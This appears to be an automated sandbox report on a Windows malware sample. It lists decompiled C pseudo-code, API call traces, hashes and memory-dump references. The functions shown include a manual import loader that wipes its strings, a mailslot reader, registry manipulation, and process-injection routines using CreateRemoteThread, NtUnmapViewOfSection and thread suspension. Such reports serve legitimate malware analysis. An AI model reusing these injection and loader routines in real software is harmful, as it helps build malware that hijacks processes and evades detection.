C-Code - Quality: 100%

			E00401389(void* __edi, intOrPtr _a4) {
				_Unknown_base(*)()* _v4;
				intOrPtr _v8;
				struct HINSTANCE__* _v12;
				signed int _v16;
				intOrPtr _t23;
				struct HINSTANCE__* _t24;
				intOrPtr _t27;
				intOrPtr _t28;
				_Unknown_base(*)()* _t29;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr _t35;
				void* _t42;
				CHAR* _t44;
				intOrPtr* _t46;
				CHAR* _t49;
				signed int* _t50;
				intOrPtr _t57;

				_t42 = __edi;
				_t50 =  &_v16;
				_v16 = _v16 & 0x00000000;
				_t33 =  *((intOrPtr*)(_a4 + 0x80));
				if(_t33 == 0) {
					L23:
					return _v16;
				}
				_t34 = _t33 + __edi;
				_t23 =  *((intOrPtr*)(_t34 + 0xc));
				if(_t23 == 0) {
					goto L23;
				}
				while(1) {
					_t44 = _t23 + _t42;
					_t24 = LoadLibraryA(_t44); // executed
					_v12 = _t24;
					if(_t24 == 0) {
						break;
					}
					memset(_t44, 0, lstrlenA(_t44));
					_t27 =  *_t34;
					_t35 =  *((intOrPtr*)(_t34 + 0x10));
					_t50 =  &(_t50[3]);
					if(_t27 != 0) {
						L6:
						_t46 = _t27 + _t42;
						_t28 =  *_t46;
						if(_t28 == 0) {
							L19:
							_t23 =  *((intOrPtr*)(_t34 + 0x20));
							_t34 = _t34 + 0x14;
							if(_t23 != 0) {
								continue;
							}
							L22:
							goto L23;
						}
						_v8 = _t35 - _t46 + _t42;
						_t57 = _t28;
						L8:
						L8:
						if(_t57 < 0) {
							if(_t28 < _t42 || _t28 >=  *((intOrPtr*)(_a4 + 0x50)) + _t42) {
								_t28 = 0;
							}
						} else {
							_t28 = _t28 + _t42;
						}
						_t11 = _t28 + 2; // 0x2
						_t49 = _t11;
						_t29 = GetProcAddress(_v12, _t49);
						_v4 = _t29;
						if(_t29 == 0) {
							goto L18;
						}
						if(_t49 >= 0) {
							memset(_t49, 0, lstrlenA(_t49));
							_t50 =  &(_t50[3]);
						}
						 *(_v8 + _t46) = _v4;
						_t46 = _t46 + 4;
						_t28 =  *_t46;
						if(_t28 != 0) {
							goto L8;
						} else {
							goto L19;
						}
						L18:
						_v16 = 0x7f;
						goto L19;
					}
					_t27 = _t35;
					if(_t35 == 0) {
						goto L19;
					}
					goto L6;
				}
				_v16 = 0x7e;
				goto L22;
			}

APIs

LoadLibraryA.KERNEL32(?), ref: 004013B6
lstrlenA.KERNEL32(?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 004013C9
memset.NTDLL ref: 004013D3
GetProcAddress.KERNEL32(?,00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 0040141E
lstrlenA.KERNEL32(00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 00401431
memset.NTDLL ref: 0040143B

Strings

~, xrefs: 00401471

Memory Dump Source

Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
Associated: 00000001.00000002.556350474.00404000.00000008.sdmp

Function 002E14CA, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 45 Total matches: 29librarythread

Similarity

Total matches: 29
API ID: FindWindowGetModuleHandleGetWindowThreadProcessIdLoadLibrary
String ID: USER32.DLL$pnls$pnls
API String ID: 1514306980-1300720345
Opcode ID: 2c5a9dded362ff6b46e0f4448b1e9a0fe29640a45ef5089f97095037391d754a
Instruction ID: 1c8a57dc03bd1ce046409f9638705802bfa1b9c8ef3fb2fc6285161cb0e1dd25
Opcode Fuzzy Hash: 95D023C40D5D4604447A48CDE4997BE01C7BC2073105A1D78501D404D34F57729F2F8D
Instruction Fuzzy Hash: 1c8a57dc03bd1ce046409f9638705802bfa1b9c8ef3fb2fc6285161cb0e1dd25

APIs

LoadLibraryA.KERNEL32(USER32.DLL), ref: 002E14D9
GetModuleHandleA.KERNEL32(USER32.DLL,002E8000,?,?,002E180F,00000000,?,002E7494), ref: 002E14FF
FindWindowA.USER32(002E8640,00000000,?,?,002E180F,00000000,?,002E7494), ref: 002E1515
GetWindowThreadProcessId.USER32(00000000,00000000,?,?,002E180F,00000000,?,002E7494), ref: 002E1520

Strings

USER32.DLL, xrefs: 002E14D3, 002E14D8, 002E14FE
pnls, xrefs: 002E1526
pnls, xrefs: 002E151B

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E1093, Relevance: 10.6, APIs: 7, Instructions: 67 Total matches: 199memorythread

Similarity

Total matches: 199
API ID: CloseHandleCreateThreadHeapCreateHeapDestroyInterlockedDecrementInterlockedIncrementSleepEx
String ID:
API String ID: 2400451634-0
Opcode ID: 20a1fe1949787535bd79f47ccd9ae32a5e8064993f8506e11f38a0a49419feba
Instruction ID: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
Opcode Fuzzy Hash: E2E02B881E4839C7857E180AD1DCF7102617FE1A5D9DC93511254561614F1DA0F77E8C
Instruction Fuzzy Hash: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775

APIs

InterlockedIncrement.KERNEL32(002E7448), ref: 002E10B0
HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 002E10C5

Part of subcall function 002E1000: memcpy.NTDLL(002E7570,?,0000000C,002E6248,0000000C,002E10E9,?,00000000,?), ref: 002E1038

CreateThread.KERNEL32(00000000,00000000,Function_0000005B,00000000,?,00000000), ref: 002E10F1
InterlockedDecrement.KERNEL32(002E7448), ref: 002E1109
SleepEx.KERNEL32(00000064,00000001), ref: 002E1125
CloseHandle.KERNEL32 ref: 002E1141
HeapDestroy.KERNEL32 ref: 002E114E

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 00401033, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64 Total matches: 190
memorysleepfile

Similarity

Total matches: 190
API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep
String ID: \\.\mailslot\msl0
API String ID: 2393858888-622273203
Opcode ID: a3ceb4dbf8eec70be79f35f386a0360ab8bfc7ba483ab19be25d62c214bd66f1
Instruction ID: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
Opcode Fuzzy Hash: 18E026820629C5C6567F100A28013B360CBBB7174BDDEE7600AA7391830F823017964A
Instruction Fuzzy Hash: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395

C-Code - Quality: 96%

			E00401033(void* _a4) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _t24;
				long _t25;
				void* _t27;
				int _t32;
				long _t33;
				void* _t34;
				void* _t36;
				long _t39;

				_pop(_t41);
				_t39 = 0;
				_v8 = 0x1000;
				_t24 = CreateMailslotA("\\\\.\\mailslot\\msl0", 0x1000, 0, 0);
				_v16 = _t24;
				if(_t24 == 0) {
					_t25 = GetLastError();
					_t36 = _a4;
					_v8 = _t25;
				} else {
					_t36 = E004011F2(0x1000);
					if(_t36 == 0) {
						L10:
						_v8 = 8;
					} else {
						do {
							_t32 = ReadFile(_v20, _t36 + _t39, 0x1000,  &_v16, 0); // executed
							if(_t32 == 0) {
								_t33 = GetLastError();
								_v8 = _t33;
								if(_t33 == 0x79) {
									_v16 = 0x1000;
									goto L8;
								}
							} else {
								_v12 = _v12 + 0x1000;
								_t39 = _t39 + _v16;
								_t34 = HeapReAlloc( *0x40305c, 0, _t36, _v12); // executed
								_t36 = _t34;
								if(_t36 == 0) {
									goto L10;
								} else {
									_v8 = _v8 & 0x00000000;
									goto L8;
								}
							}
							goto L11;
							L8:
							Sleep(0x64); // executed
						} while (_v16 == 0x1000);
					}
					L11:
					CloseHandle(_v20);
				}
				if(_v8 == 0) {
					_t27 = _a4;
					 *(_t27 + 4) = _t36;
					 *((intOrPtr*)(_t27 + 8)) = _t39;
				}
				return _v8;
			}

APIs

CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
GetLastError.KERNEL32 ref: 004010D6

Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,00000000,00401543,00000208,00000000,?,004015FD,?,00000000,?,00000000,?,?,?,00000000), ref: 004011FE

ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00401076
HeapReAlloc.KERNEL32(00000000,00000000,?), ref: 00401092
GetLastError.KERNEL32 ref: 004010A4
Sleep.KERNELBASE(00000064), ref: 004010B7
CloseHandle.KERNEL32(?), ref: 004010CE

Strings

\\.\mailslot\msl0, xrefs: 00401047

Memory Dump Source

Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
Associated: 00000001.00000002.556350474.00404000.00000008.sdmp

Function 002E1673, Relevance: 10.6, APIs: 7, Instructions: 62 Total matches: 194file

Similarity

Total matches: 194
API ID: GetLastError$CreateFileCreateFileMappingGetFileSizeMapViewOfFile
String ID:
API String ID: 1233022807-0
Opcode ID: 4e81c09fe99e8d89ea399b534ce1bd7a993d4de009fd61985864dbb219ec32a9
Instruction ID: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
Opcode Fuzzy Hash: A4D05E6E0C193ED1C1532416D8D6B2527027F6194EA4C1C322A8925217EFF471DFCB3D
Instruction Fuzzy Hash: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca

APIs

CreateFileW.KERNEL32(002E74BC,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002E1689
CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E169F
MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E16B7
GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,002E7494), ref: 002E16C9
GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16D7
GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16E4
GetLastError.KERNEL32(?,002E7494), ref: 002E16F3

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E22D2, Relevance: 9.1, APIs: 6, Instructions: 105 Total matches: 307threadsynchronizationinjection

Similarity

Total matches: 307
API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
String ID:
API String ID: 307323562-0
Opcode ID: c27f9509d813d6daf3205bb55a255c7f03bb055f708febb10643d95fc60cc1d5
Instruction ID: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
Opcode Fuzzy Hash: 6C017B4E066E93C6E9662240A651FB19381BF43A74E8E9B3642B1213DA5F54B00F970D
Instruction Fuzzy Hash: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed

APIs

memset.NTDLL ref: 002E22F5

Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331

Part of subcall function 002E3DE6: NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
Part of subcall function 002E3DE6: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
Part of subcall function 002E3DE6: SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A

ResumeThread.KERNELBASE(?), ref: 002E2418

Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000,002E24C1), ref: 002E1A4D
Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000000,00000000,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1), ref: 002E1A81

ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
SuspendThread.KERNELBASE(?), ref: 002E23A1

Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD

Part of subcall function 002E2175: memset.NTDLL ref: 002E21A3
Part of subcall function 002E2175: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
Part of subcall function 002E2175: WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
Part of subcall function 002E2175: SuspendThread.KERNEL32(?), ref: 002E224E

Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4

GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E2427, Relevance: 9.1, APIs: 6, Instructions: 78 Total matches: 154threadinjection

Similarity

Total matches: 154
API ID: CloseHandleGetLastError$CreateRemoteThreadOpenProcess
String ID:
API String ID: 2418253885-0
Opcode ID: fc6ed82c56bfa57ab6fc962b82ba81a2bd1eb2d9df591a1fbb7d31c039fc64dc
Instruction ID: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
Opcode Fuzzy Hash: 1CE055000D66E7C19832E052E490BB2A246FE0120EA8C2B30022C24723AF0935572A8C
Instruction Fuzzy Hash: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65

APIs

Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331

OpenProcess.KERNEL32(001F0FFF,00000000,002E15DA,002E15DA,C000009A,002E7494,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E2452
CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24AC
GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24CE

Part of subcall function 002E22D2: memset.NTDLL ref: 002E22F5
Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
Part of subcall function 002E22D2: WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
Part of subcall function 002E22D2: SuspendThread.KERNELBASE(?), ref: 002E23A1
Part of subcall function 002E22D2: GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?), ref: 002E2418

CloseHandle.KERNEL32(002E15DA), ref: 002E24C6
CloseHandle.KERNEL32(?), ref: 002E24E0
GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24E8

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E32C5, Relevance: 7.5, APIs: 5, Instructions: 44 Total matches: 223libraryloader

Similarity

Total matches: 223
API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess
String ID:
API String ID: 2525968537-0
Opcode ID: 4e39e43a056f2dbc5d7c37fe404edc70e416bd2b8df7daf7df2d9869e76f3aeb
Instruction ID: 2669984e2993e946f45bcfa7194f2494cfbb83a06d855a5a0d403690f303e393
Opcode Fuzzy Hash: A5D05E444F5C37C94021B9D2E46EB7122D13EA02DD4CC31A11258609175F3132EB4A7D
Instruction Fuzzy Hash: 2669984e2993e946f45bcfa7194f2494cfbb83a06d855a5a0d403690f303e393

APIs

GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
CloseHandle.KERNEL32(002E74A4), ref: 002E3331

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E421D, Relevance: 6.1, APIs: 4, Instructions: 99 Total matches: 294registrysynchronization

Similarity

Total matches: 294
API ID: RegCloseKeyRegEnumKeyExRegOpenKeyExWaitForSingleObject
String ID:
API String ID: 748258982-0
Opcode ID: 34aa78697289c7e337ace2860545490defdbd3f605ccc2af44dba403dee5d043
Instruction ID: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
Opcode Fuzzy Hash: D1F0C0450B6CC357C42B90426F92772D241EF218C8C8C67556BB87D2FA0D207193512B
Instruction Fuzzy Hash: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6

APIs

RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,?,?,00000000,000000B7,?,?,00000000,?,?,002E7494), ref: 002E4244

Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168

RegEnumKeyExA.KERNEL32(?,?,?,002E7494,00000000,00000000,00000000,00000000,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E428B
WaitForSingleObject.KERNEL32(00000000,?), ref: 002E42F8

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

Part of subcall function 002E2E04: StrChrA.SHLWAPI(002E7494,0000005F), ref: 002E2E47
Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E7494), ref: 002E2E5F
Part of subcall function 002E2E04: RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 002E2E95
Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2EBB
Part of subcall function 002E2E04: lstrlenW.KERNEL32 ref: 002E2ECC
Part of subcall function 002E2E04: RtlAllocateHeap.NTDLL(00000000,002E74CA), ref: 002E2EE1
Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2F06
Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F2A
Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F3C
Part of subcall function 002E2E04: lstrcmpiW.KERNEL32(00000000), ref: 002E2F53
Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E80FA), ref: 002E2F95
Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,?), ref: 002E2FEE
Part of subcall function 002E2E04: RegCreateKeyA.ADVAPI32(?,?,?), ref: 002E3002
Part of subcall function 002E2E04: RegQueryValueExA.KERNEL32(?,002E8256,00000000,?,?,002E7494), ref: 002E3025
Part of subcall function 002E2E04: RegOpenKeyExA.ADVAPI32(?,?,00000000,B.,?,?,?,?), ref: 002E3088
Part of subcall function 002E2E04: RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 002E30A3
Part of subcall function 002E2E04: RegDeleteValueW.ADVAPI32(?,002E7560), ref: 002E30B1
Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30BA
Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30C3
Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,002E7494,?), ref: 002E30D8
Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,00000000), ref: 002E30FB
Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(00000000), ref: 002E310D

RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E4320

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E3368, Relevance: 6.1, APIs: 4, Instructions: 71 Total matches: 385file

Similarity

Total matches: 385
API ID: CloseHandleCreateFileReadFileSetFilePointer
String ID:
API String ID: 3466452087-0
Opcode ID: 02226af8252c5962bd8a1246e83dd3874d4324e234fa97607c7506bcccf428ae
Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
Opcode Fuzzy Hash: 73E026442E9D83CDC6535584D842B36B370E3A060AD9CA7724708AF2329F2A3127DF3E
Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722

APIs

Part of subcall function 002E3C8B: GetModuleFileNameW.KERNEL32(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB1
Part of subcall function 002E3C8B: GetModuleFileNameA.KERNELBASE(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB9
Part of subcall function 002E3C8B: GetLastError.KERNEL32(?,?,002E2A88,?,00000001,002E618C,0000000C,00000000,?,?,?,002E17BE), ref: 002E3CF7

Part of subcall function 002E48FB: lstrcmp.KERNEL32(?,002E7494), ref: 002E49A8
Part of subcall function 002E48FB: lstrlen.KERNEL32(?,00000000,00000000,002E1852), ref: 002E49B3

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E33BB
SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,002E1BAF,002E8451), ref: 002E33CD
ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 002E33E5
CloseHandle.KERNEL32(?), ref: 002E3400

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 00401000, Relevance: 6.0, APIs: 4, Instructions: 16 Total matches: 141
memorythread

Similarity

Total matches: 141
API ID: ExitThreadGetLastErrorGetModuleHandleHeapCreate
String ID:
API String ID: 1629895477-0
Opcode ID: 3346d6f2501fa6e0feb3b6aa12f6673d7b3f00fa5b3f967e9b051ebee9392a59
Instruction ID: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
Opcode Fuzzy Hash: 3EB09250504A0380E05CBAE1780035312873B92346D2C852003C330A07C34130A80E44
Instruction Fuzzy Hash: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc

C-Code - Quality: 100%

			_entry_() {
				void* _t2;
				long _t3;
				long _t4;

				_t4 = GetModuleHandleA(0); // executed
				_t2 = HeapCreate(0, 0x10000, 0); // executed
				if(_t2 == 0) {
					_t3 = GetLastError();
				} else {
					_t3 = E00401639(_t2, _t4); // executed
				}
				ExitThread(_t3);
			}

0x00401012
0x00401014
0x0040101c
0x00401026
0x0040101e
0x0040101f
0x0040101f
0x0040102d

APIs

GetModuleHandleA.KERNEL32(00000000), ref: 00401003
HeapCreate.KERNELBASE(00000000,00010000,00000000), ref: 00401014
GetLastError.KERNEL32 ref: 00401026
ExitThread.KERNEL32 ref: 0040102D

Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
Part of subcall function 00401639: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
Part of subcall function 00401639: GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
Part of subcall function 00401639: WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
Part of subcall function 00401639: GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
Part of subcall function 00401639: TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 004016F0
Part of subcall function 00401639: GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 00401704
Part of subcall function 00401639: GetLastError.KERNEL32(?,00000000), ref: 0040170D

Memory Dump Source

Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
Associated: 00000001.00000002.556350474.00404000.00000008.sdmp

Function 002E1186, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 56 Total matches: 157memory

Similarity

Total matches: 157
API ID: HeapFree
String ID: Local\
API String ID: 2968971433-422136742
Opcode ID: 61488c984085a4f122944a9e8d254705a555d96723ee699a890829b662474710
Instruction ID: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
Opcode Fuzzy Hash: DFE02C01219EB1CFC4272014EE2813781B8FB1082A8CDB37443C00A2F2EE2825336E0B
Instruction Fuzzy Hash: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a

APIs

Part of subcall function 002E45C1: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 002E4610

Part of subcall function 002E475C: lstrlen.KERNEL32(002E618C,00000000,?,00000027,002E618C,00000000,00000000,002E822E,00000000,?,002E618C,00000000,00000000), ref: 002E4792
Part of subcall function 002E475C: lstrcpy.KERNEL32(00000000,00000000), ref: 002E47B6
Part of subcall function 002E475C: lstrcat.KERNEL32(00000000,00000000), ref: 002E47BE

HeapFree.KERNEL32(00000000,?,Local\), ref: 002E1217

Strings

Local\, xrefs: 002E11CD, 002E11D2, 002E11F7

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Similar Non-Executed Functions

Function 002E4B73, Relevance: 7.6, APIs: 5, Instructions: 59 Total matches: 218stringthreadtime

Similarity

Total matches: 218
API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy
String ID:
API String ID: 1809591024-0
Opcode ID: e1752541d73a16271eeb0a7262a47e2e067e5139649c82f5e8bd71f01fb1fcfd
Instruction ID: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
Opcode Fuzzy Hash: 28D02E858E0880DB9D3B8808E04072682C22C2830218C78164A0A317226F20318FFF2D
Instruction Fuzzy Hash: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9

APIs

Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168

GetCurrentThreadId.KERNEL32(?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BAB
GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BB7
GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 002E4BC5
PathFindExtensionA.SHLWAPI(00000000), ref: 002E4BD9
lstrcpy.KERNEL32(00000000), ref: 002E4BE0

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

